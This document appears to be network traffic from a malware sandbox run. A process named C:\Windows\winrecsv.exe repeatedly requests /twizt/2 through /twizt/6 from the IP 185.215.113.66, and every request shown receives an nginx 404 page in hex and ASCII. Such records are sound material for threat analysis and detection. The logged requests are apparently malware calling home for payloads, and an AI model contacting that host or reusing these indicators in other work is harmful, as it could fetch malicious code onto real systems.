6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:58.258836985 CEST | 1128 | OUT | GET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:58.314960003 CEST | 1129 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:58 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:59.323095083 CEST | 1129 | OUT | GET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:59.382657051 CEST | 1130 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:59 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 15, 2022 18:32:00.581275940 CEST | 1130 | OUT | GET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
Aug 15, 2022 18:32:00.640603065 CEST | 1131 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:00 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.7 | 49787 | 185.215.113.66 | 80 | C:\Windows\winrecsv.exe
Timestamp | kBytes transferred | Direction | Data
Aug 15, 2022 18:32:05.406146049 CEST | 1138 | OUT | GET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
Aug 15, 2022 18:32:05.462749958 CEST | 1139 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:05 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 15, 2022 18:32:06.478008986 CEST | 1146 | OUT | GET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
Aug 15, 2022 18:32:06.550353050 CEST | 1147 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:06 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 15, 2022 18:32:07.556500912 CEST | 1168 | OUT | GET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
Aug 15, 2022 18:32:07.613881111 CEST | 1169 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:07 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 15, 2022 18:32:08.618907928 CEST | 3975 | OUT | GET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
Aug 15, 2022 18:32:08.677377939 CEST | 3976 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:08 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 15, 2022 18:32:09.696106911 CEST | 6315 | OUT | GET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
Aug 15, 2022 18:32:09.757704020 CEST | 6316 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:09 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.7 | 49794 | 185.215.113.66 | 80 | C:\Windows\winrecsv.exe
Timestamp | kBytes transferred | Direction | Data
Aug 15, 2022 18:32:12.991106033 CEST | 6317 | OUT | GET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
Aug 15, 2022 18:32:13.048749924 CEST | 6318 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:13 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 15, 2022 18:32:14.066327095 CEST | 6318 | OUT | GET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
Aug 15, 2022 18:32:14.123684883 CEST | 6319 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:14 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 15, 2022 18:32:15.134737015 CEST | 6319 | OUT | GET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
Aug 15, 2022 18:32:15.194560051 CEST | 6320 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:15 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:16.212922096 CEST | 7016 | OUT | GET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:16.270699978 CEST | 7017 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:16 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:17.289227009 CEST | 7017 | OUT | GET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:17.350804090 CEST | 7018 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:17 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID: 8 | Source IP: 192.168.2.7 | Source Port: 49797 | Destination IP: 185.215.113.66 | Destination Port: 80 | Process: C:\Windows\winrecsv.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 15, 2022 18:32:20.586002111 CEST | 7025 | OUT | GET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:20.643721104 CEST | 7026 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:20 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:21.672964096 CEST | 7026 | OUT | GET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:21.729661942 CEST | 7027 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:21 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:23.761060953 CEST | 7028 | OUT | GET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:23.817989111 CEST | 7028 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:24.838673115 CEST | 7035 | OUT | GET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:24.898762941 CEST | 7036 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:25.923537016 CEST | 7036 | OUT | GET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:25.980289936 CEST | 7037 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID: 9 | Source IP: 192.168.2.7 | Source Port: 49799 | Destination IP: 185.215.113.66 | Destination Port: 80 | Process: C:\Windows\winrecsv.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 15, 2022 18:32:29.194683075 CEST | 7038 | OUT | GET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:29.251115084 CEST | 7039 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:30.271567106 CEST | 7039 | OUT | GET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:30.333163977 CEST | 7040 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:31.339890957 CEST7045OUTGET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:31.397250891 CEST7045INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:31 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
